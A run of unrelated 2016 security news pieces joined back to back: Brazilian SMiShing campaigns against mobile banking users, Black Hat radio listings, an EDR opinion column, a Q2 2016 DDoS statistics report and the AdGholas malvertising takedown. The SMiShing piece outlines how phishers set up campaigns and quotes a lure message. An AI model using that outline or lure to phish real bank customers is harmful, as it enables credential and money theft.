Such numbers and the possibility of cheaply sending SMS messages are very attractive to cybercriminals, who are investing their time and effort to create new attacks. Getting started doesn’t require that much money or preparation: first they need to register a domain (usually a .mobi domain), prepare a phishing page in mobile format, hire a bulk SMS service (as cheap as 2 cents per message sent, and generally paid for with a cloned credit card) and voilá! Getting the telephone numbers of the victims isn’t a problem either: huge databases of mobile numbers can easily be purchased on the Brazilian underground, or can be captured in attacks using WhatsApp as bait.

The SMiShing messages inform recipients about a credit card or a bank account that has supposedly been blocked, and always include a link: “Your data is outdated, your account may be blocked. Please update at <phish URL>” – an SMiShing message sent by phishers Why target users of mobile banking? Because it’s easier to hack a bank account when accessed from a mobile terminal instead of a desktop. We’ve listed some of the reasons for that below: No protection: most smartphone users in Brazil still don’t use a dedicated AV on their phones.

A survey performed by B2B International in 2015 showed only 56% of smartphone owners around the world do so. No security plugins: unlike desktops, most banks still don’t require the installation of a security plugin on user devices, despite most banks offering dedicated access via their mobile apps.

Furthermore, fake mobile banking apps from Brazilian banks have also been found in the Play Store. When a criminal decides to phish a mobile banking user, it’s more effective if the attack is compatible with any mobile browser. Simple authentication: most Brazilian banks use very simple authentication on mobile devices, usually just asking for the account number and a six-digit password. Common SMS usage: it’s very common for banks in Brazil to send notifications via SMS. When you buy something or withdraw money for your account, you’ll receive an SMS confirming the operation.

This approach has allowed Brazilian banks to decrease the number of fraud cases, in particular, this is because customers are aware of any fraud involving their credit cards or bank accounts as soon as it starts.

Confusing a SMiShing message with a legit SMS from your bank is very easy. The mobile versions of these phishing banking websites open correctly in the browser, facilitating the theft of user credentials.

The phishers’ tactic is to force the user to access the website via their mobile devices, and not from a desktop.
If the victim tries to access the phishing domain using their computer, the following message displayed: “Service unavailable for desktops, only for mobile devices” The phishing domain only shows its full content when access is made via a mobile browser: The cybercriminals create phishing pages for several banks, in an array of colors and styles: Most of the domains used in these attacks are using the .mobi TLD: We published a list of some of the domains we found here (if you’re an AV guy, block them!). It’s important to highlight one other thing: if access is made from an IP outside of Brazil, some domains will display nothing.
It’s a method used by Brazilian phishers to keep their attacks alive for as long as possible, because if you don’t see it, you won’t block the domain. Users of our products, including the Safe Browser for iOS, Windows Phone, Android and Fraud Prevention solutions are protected against mobile phishing and SMiShing attacks.

Dark Reading Radio at Black Hat 2016: 2 Shows, 4 #BHUSA...

Even if you can't physically be at Black Hat USA 2016, Dark Reading offers a virtual alternative to engage with presenters about hot show topics and trends. Couldn’t make the trip? Not to worry.

Dark Reading editors over the last few weeks have interviewed key Black Hat figures and presenters to give you a taste of the show in two pre-recorded Dark Reading Radio episodes to be broadcast Wednesday Aug 3 and Thursday Aug 4. Here’s the lineup: Dark Reading Radio at Black Hat 2016, Episode 1:Date/Time: Wednesday, August 03, 2016, 1:00 p.m. New York / 10:00 a.m. Las VegasGuests: Black Hat General Manager Steve Wylie & Bugcrowd Senior Director of Researcher Operations Kymberlee Price In this episode, Editor In Chief Tim Wilson talks with Black Hat General Manager Steve Wylie about the many programs and sessions being offered at this week’s Black Hat USA conference, highlighting some of the show’s most important keynote adresses, hot topics in the briefings, and new programs built around security careers and startup companies. He also tells Tim what makes Black Hat a different type of information security event – from in-depth training to social functions that bring security pros together. In the second segment of the radio show, Kymberlee Price, give yours truly a behind the scenes look at how to build a security incident response team using crowd sourcing. Kymberlee is senior director of researcher operations at Bugcrowd.
She’ll be offering some takeaways and tips from her Black Hat 16 briefing Building a Product Security Incident Response Team: Learnings from the Hivemind, which she is presenting this week at the Mandalay Bay in Las Vegas. Dark Reading Radio at Black Hat 2016, Episode 2Date/Time: Thursday, August 04, 2016, 1:00 p.m. New York / 10:00 a.m. Las VegasGuests:  Wesley McGrew, Director of Cyber Operations at Horne Cyber & Konstantin Berlin, Senior Research Engineer at Invincea Labs In this special episode of Dark Reading Radio, Executive Editor Kelly Jackson Higgins talks to Wesley McGrew, director of cyber operations at Horne Cyber, about his research on hacking penetration testers, "Secure Penetration Testing Operations: Demonstrated Weaknesses In Learning Material And Tools." McGrew over the past few years has been examining vulnerabilities and security weaknesses in penetration testing tools, processes, and practices, and will release his homegrown Snagterpreter tool at Black Hat that allows an attacker to hijack, monitor, and alter traffic between the pen tester and his or her target/client. Capping things off, is Sara Peters interview with Konstantin Berlin, senior research engineer at Invincea Labs.

Berlin hones in one of the key cybersecurity promises of machine learning (particularly "deep learning") for security analysis, with a focus on how to take give organizations more information about unfamiliar code than simply "it's benign" or "it's malicious." His talk is, "An AI Approach To Malware Similarity Analysis: Mapping The Malware Genome with a Deep Neural Network." Hope you to see you in the radio studio on Wednesday and Thursday.

And if you can't make it this week, you can view the show in our archives at your convenience. (Registration is Required.) Marilyn has been covering technology for business, government, and consumer audiences for over 20 years. Prior to joining UBM, Marilyn worked for nine years as editorial director at TechTarget Inc., where she launched six Websites for IT managers and administrators supporting ...
View Full Bio More Insights

Clinton Campaign To Hold Cybersecurity-Themed Fundraiser In Vegas

Cybersecurity experts to head event during the ongoing Black Hat hacker conference this week. Plagued by cybersecurity problems throughout its presidential campaign, Democratic nominee Hillary Clinton’s campaign will now be hosting a cybersecurity-themed charity event at Las Vegas this week, during the ongoing Black Hat cybersecurity conference, reports FedScoop. Heading the fundraiser panel will be Black Hat founder Jeff Moss, Harvard University professor Michael Sulmeyer, who heads Clinton’s cyber policy working group, and Cambridge Global Advisors chief Jake Braun, also strategic advisor to Department of Homeland Security and Pentagon on cybersecurity issues. Going by their experience in digital security, it is likely that Sulmeyer and Braun could find themselves with information protection responsibilities in the next administration, says FedScoop. The fundraiser comes close on the heels of a Clinton campaign breach in which the analytics data program it uses was compromised during the DNC hack. For more details, click here. Dark Reading's Quick Hits delivers a brief synopsis and summary of the significance of breaking news events.

For more information from the original source of the news item, please follow the link provided in this article.
View Full Bio More Insights

How the Adoption of EDR Transforms a SOC's Effectiveness

Endpoint detection response is helping take the headache out of responding to threats by providing visibility where most organizations are blind. Endpoint detection and response (EDR) is much more than a next-generation endpoint capability, it is a driving force of evolutionary change within security operations centers (SOC) today.

EDR provides visibility where most organizations are blind.
In our network-centric world, EDR provides a fast path to endpoint context, enabling rapid identification of false positives or the origin of attacks.  To illustrate this point, I created a litmus test to review common limitations in security information and event management (SIEM) and threat monitoring today.

Because most SIEM have insufficient endpoint data, threat analysts struggle to answer even the most fundamental questions, such as:  Is the attack targeting a critical, sensitive, or regulated asset?   Does the identified exploit target the right operating system or application? Nor the more complex questions such as: What process executed a connection to the known malicious IP or URL? What occurred following the successful inbound attack?  Life without EDR  For organizations without EDR, researching and responding to threats is a maddening exercise. With limited access to endpoints or endpoint context, threat analysts -- particularly in large enterprise or managed security service provider (MSSP) -- have few choices other than to open a ticket and delegate the research to others with access to the targeted machine.  The stakeholder could be in another department or region.

For MSSPs, this is the heartbeat of communication between the SOC and customers under attack.

Tickets may be answered quickly but a large majority take days and weeks.
Some aren’t answered at all.
In fact, due to the substantial delays incurred, special tools have been created to address the hold up.  One such tool is called alert suppression. Using alert suppression, mature SOCs can hide repetitive alerts waiting for information requested from stakeholders. Another technique is to auto notify and close tickets without response. Last but not least, it’s often easier to simply re-image the machine than to investigate root cause.  This is the average day to day of threat analysts in the SOC.
It’s not sexy, nor is it cost effective. Repeated tens (if not hundreds) of times on a daily or weekly basis drives up organizational costs to an unsupportable level. When I hear people say: “I can’t afford to build or staff a SOC,” it’s not surprising given the status quo. Manual and human intensive tasks give security a bad name.

This is life without EDR.  Life with EDR The introduction of EDR is a major evolution in SOC effectiveness.

Threat analysts no longer need to ask others to validate threats, the data is available to real-time query. With immediate access to the data, three incredible things happen: The SOC Analyst can research and respond to alerts in rapid succession, dramatically increasing their workload.  Armed with endpoint context, Tier 1 threat analysts can perform more sophisticated analysis, encroaching on the role typically assigned to Tier 2. By eliminating the high volume of tickets requesting context, MSSP customers or stakeholders of large enterprise are relieved of the deluge of inquiries.  Inevitably, a breach will occur. When that does happen, utilizing a best-in-class EDR vendor that includes continuous and centralized recording takes the guesswork out of incident response.

The attacker may have erased their tracks, but EDR recorded the attackers every move with an endpoint DVR, the cyber equivalent to a surveillance camera. With a complete historical recording of an attacker and their actions, incident responders don’t need to fly to the scene of the crime, scrape RAM, or image machines to look for clues.

The full recorded history of the attack enables on the spot incident response.  EDR is much more than an endpoint security product; it’s causing an evolution in the people and process utilized within security operation centers globally.

And for individual corporations or customers who rely on MSSPs to deliver skills and expertise, EDR is a fundamental technology that is not optional. It’s a foundational requirement of the next generation security operation center and primary reason we’ll collapse the average ~250 day gap between attack initiation and discovery. John Markott is a Director of Product Management at Carbon Black. His mission is to help managed security service providers and incident-response firms ride the wave and reap the rewards of next-generation endpoint security. With nearly two decades of experience in InfoSec, ...
View Full Bio More Insights

Kaspersky DDoS Intelligence Report for Q2 2016

Q2 events DDoS attacks on cryptocurrency wallet services have played an important role in the lives of these services.
In the second quarter of 2016, two companies – CoinWallet and Coinkite – announced they were terminating their work due to lengthy DDoS attacks.

According to Coinkite’s official blog, the e-wallet service will be shut down, as well as its API.

The company admits that the decision was largely due to constant attacks and pressure from various governments who want to regulate cryptocurrency. A piece of malware was detected that possesses worm functionality and builds a botnet of Linux-based routers (including Wi-Fi access points).
It spreads via Telnet.

An analysis of the worm’s code has shown that it can be used in various types of DDoS attacks. Experts have registered a growing number of botnet C&C servers operating based on LizardStresser – a tool used to perform DDoS attacks.

The LizardStresser source codes belong to the hacker group Lizard Squad and were made publically available at the end of 2015.

This is what led to the increase in the number of botnets using new versions of the tool. Researchers discovered a botnet consisting of 25 000 devices most of which are surveillance cameras.

According to the experts, 46% of the infected devices are CCTV systems H.264 DVR.

The other compromised devices were manufactured by ProvisionISR, Qsee, QuesTek, TechnoMate, LCT CCTV, Capture CCTV, Elvox, Novus, and MagTec CCTV. A new botnet named Jaku located mainly in Japan and South Korea was detected. Researchers have stated that the botnet operators are focused on major targets: engineering companies, international organizations, scientific institutions. A new modification of Cerber ransomware that uses an infected device to carry out DDoS attacks was discovered.

This cryptor Trojan is responsible for sending the UDP packets in which it changes the sender address for the address of the victim.

A host that receives the packet sends a reply to the victim’s address.

This technique is used to organize a UDP flood, meaning that this Trojan, in addition to its basic ransomware functionality, also integrates the functionality of a DDoS bot. Statistics for botnet-assisted DDoS attacks Methodology Kaspersky Lab has extensive experience in combating cyber threats, including DDoS attacks of various types and levels of complexity.

The company’s experts monitor botnet activity with the help of the DDoS Intelligence system. Resources in 70 countries were targeted by DDoS attacks in Q2 2016 #KLReport Tweet The DDoS Intelligence system (part of Kaspersky DDoS Protection) is designed to intercept and analyze commands sent to bots from command and control (C&C) servers, and does not have to wait until user devices are infected or cybercriminal commands are executed in order to gather data. This report contains the DDoS Intelligence statistics for the second quarter of 2016. In the context of this report, a single (separate) DDoS attack is defined as an incident during which any break in botnet activity lasts less than 24 hours.
If the same web resource was attacked by the same botnet after a break of more than 24 hours, this is regarded as a separate DDoS attack.

Attacks on the same web resource from two different botnets are also regarded as separate attacks. The geographic distribution of DDoS victims and C&C servers is determined according to their IP addresses.
In this report, the number of DDoS targets is calculated based on the number of unique IP addresses reported in the quarterly statistics. 77.4% of targeted resources in Q2 2016 were located in China #KLReport Tweet It is important to note that DDoS Intelligence statistics are limited to those botnets detected and analyzed by Kaspersky Lab.
It should also be noted that botnets are just one of the tools used to carry out DDoS attacks; therefore, the data presented in this report does not cover every DDoS attack that has occurred within the specified time period. Q2 Summary Resources in 70 countries were targeted by DDoS attacks in Q2 2016. 77.4% of targeted resources were located in China. China, South Korea and the US remained leaders in terms of the number of DDoS attacks and number of targets. The longest DDoS attack in Q2 2016 lasted for 291 hours (or 12.1 days) – significantly longer than the previous quarter’s maximum (8.2 days). SYN DDoS, TCP DDoS and HTTP DDoS remain the most common DDoS attack scenarios.

The proportion of attacks using the SYN DDoS method increased 1.4 times compared to the previous quarter. In Q2 2016, 70.2% of all detected attacks were launched from Linux botnets, which is almost double the figure for the first quarter. Geography of attacks In Q2 2016, the geography of DDoS attacks narrowed to 70 countries, with China accounting for 77.4% of attacks.
In fact, 97.3% of the targeted resources were located in just 10 countries.

The three most targeted countries remained unchanged – China, South Korea and the US. Distribution of DDoS attacks by country, Q1 2016 vs. Q2 2016 This quarter’s statistics show that 94.3% of attacks had unique targets within the 10 most targeted countries. Distribution of unique DDoS attack targets by country, Q1 2016 vs. Q2 2016 Here too China was the leader: 71.3% of all DDoS attacks targeted unique resources located in the country (vs. 49.7% in Q1). In Q2 2016 China, South Korea and the US remained leaders in terms of the number of DDoS attacks #KLReport Tweet The growth in the proportion of attacks on Chinese resources resulted in a decline in the share of attacks on resources in the other TOP 10 countries: South Korea saw its share fall by 15.5 percentage points, while the contribution of the US fell by 0.7 p.p. Russia left the TOP 5 after its share decreased by 1.3 p.p.
Vietnam took Russia’s place after its share remained unchanged (1.1%).

Germany and Canada both left the TOP 10 and were replaced by France and the Netherlands on 0.9% and 0.5% respectively. Changes in DDoS attack numbers DDoS activity was relatively uneven in Q2 2016, with a lull from late April till the end of May and two sharp peaks on 29 May and 2 June.

The peak number of attacks in one day was 1,676, recorded on 6 June. Number of DDoS attacks over time* in Q2 2016 *DDoS attacks may last for several days.
In this timeline, the same attack can be counted several times, i.e. one time for each day of its duration.
The longest DDoS attack in Q2 2016 lasted for 291 hours (or 12.1 days) #KLReport Tweet An analysis of the data for the first half of 2016 shows that although the distribution of DDoS attack numbers by day of the week remains uneven, a steady upward trend is evident. Number of DDoS attacks, Q1 2016 – Q2 2016 In Q2, Tuesday was the most active day of the week for DDoS attacks (15.2% of attacks), followed by Monday (15.0%).

Thursday, which came second in Q1, fell one place (-1.4 p.p.).
Sunday became the quietest day of the week in terms of DDoS attacks (13.0%). Distribution of DDoS attack numbers by day of the week Types and duration of DDoS attacks The ranking of the most popular attack methods remained unchanged from the previous quarter.

The SYN DDoS method has further strengthened its position as leader: its share increased from 54.9% to 76%.

The proportion of the other types of attacks decreased slightly except for UDP DDoS whose contribution grew by 0.7 p.p. However, those little fluctuations did not affect the order of the Top 5. Distribution of DDoS attacks by type The growth in the popularity of SYN-DDoS is largely down to the fact that during the second quarter of 2016, 70.2% of all detected attacks came from Linux botnets.

This was the first time in a number of quarters that there has been such an imbalance between the activity of Linux- and Windows-based DDoS bots. Previously, the difference had not exceeded 10 percentage points. Namely Linux bots are the most appropriate tool for using SYN-DDoS. Correlation between attacks launched from Windows and Linux botnets Attacks that last no more than four hours remained the most popular, although their share decreased from 67.8% in Q1 to 59.8% in Q2 of 2016.

At the same time, the proportion of longer attacks increased considerably – attacks that lasted 20-49 hours accounted for 8.6% (vs. 3.9% in the first quarter) and those that lasted 50-99 hours accounted for 4% (vs. 0.8% in the previous quarter). SYN DDoS, TCP DDoS and HTTP DDoS remain the most common DDoS attack scenarios in Q2 2016 #KLReport Tweet The longest DDoS attack in the second quarter of 2016 lasted for 291 hours, which significantly exceeded the Q1 maximum of 197 hours. Distribution of DDoS attacks by duration (hours) C&C servers and botnet types In Q2, South Korea remained the clear leader in terms of the number of C&C servers located on its territory, with its share amounting to 69.6%, a 2 p.p. increase from the first quarter of 2016.

The TOP 3 countries hosting the most C&C servers (84.8%) remained unchanged, while Brazil (2.3%), Italy (1%) and Israel (1%) all entered the TOP 10. Distribution of botnet C&C servers by country in Q2 2016 As in previous quarters, 99.5% of DDoS targets in Q2 2016 were attacked by bots belonging to one family.

Cybercriminals launched attacks using bots from two different families (used by one or more botnet masters) in just 0.5% of cases.

The most popular families of the quarter were Xor, Yoyo and Nitol. Conclusion The second quarter of 2016 saw cybercriminals paying close attention to financial institutions working with cryptocurrency.
Several of these organizations cited DDoS attacks as the reason for ceasing their activities.
Intense competition leads to the use of unfair methods, one of which is the use of DDoS attacks.

A strong interest on the part of the attackers is due to a particular feature of the businesses involved in processing cryptocurrency – not everyone is happy about the lack of regulation when it comes to cryptocurrency turnover. In Q2 2016, 70.2% of all detected attacks were launched from Linux botnets #KLReport Tweet Another trend is the use of vulnerable IoT devices in botnets to launch DDoS attacks.
In one of our earlier reports, we wrote about the emergence of a botnet consisting of CCTV cameras; the second quarter of 2016 saw a certain amount of interest in these devices among botnet organizers.
It is possible that by the end of this year the world will have heard about some even more “exotic” botnets, including vulnerable IoT devices.

AdGholas Malvertising Campaign Scam Smashed

SECURITY OUTFIT PROOFPOINT has made its point again and uncovered a thing called AdGholas which it warned is a pretty damn significant malvertising campaign. The firm has already smashed the campaign into the ground, thanks to work with service providers and fellow security company Trend Micro. The campaign was used by three groups, and a number of websites were affected by the placement of infected adverts.

A Proofpoint blog post explained that victims included the Belfast Telegraph and a French hotel. "Proofpoint researchers have discovered and analysed a massive malvertising network operating since 2015, run by a threat actor we designated as AdGholas and pulling in as many as one million client machines per day," the firm said. "This malvertising operation infected thousands of victims every day using a combination of techniques including sophisticated filtering and steganography, as analysed by fellow researchers at Trend Micro. "While AdGholas appears to have ceased operation in the wake of action by advertising network operators following notification by Proofpoint, the scale and sophistication of this operation demonstrate the continued evolution and effectiveness of malvertising." Proofpoint does a lot of this sort of thing, and just recently cast a dark light over Pokémon. AdGholas might seem like any other old malvertising whack but is a bit of a pioneer in that it is first such campaign to use stenography in drive-by malware attacks. "This campaign represents the first documented use of steganography in a drive-by malware campaign, and the attacks employed ‘informational disclosure' bugs perceived to be low risk to stay below the radar of vendors and researchers," Proofpoint said. AdGholas even used evasive tactics to avoid discovery and suspicion, and redirected or mimicked legitimate sites when under close inspection.

And it did all this undetected for over a bloody year. We guess the lesson here is to trust in security companies and don't click on links that don't look kosher.

Easier said than done. µ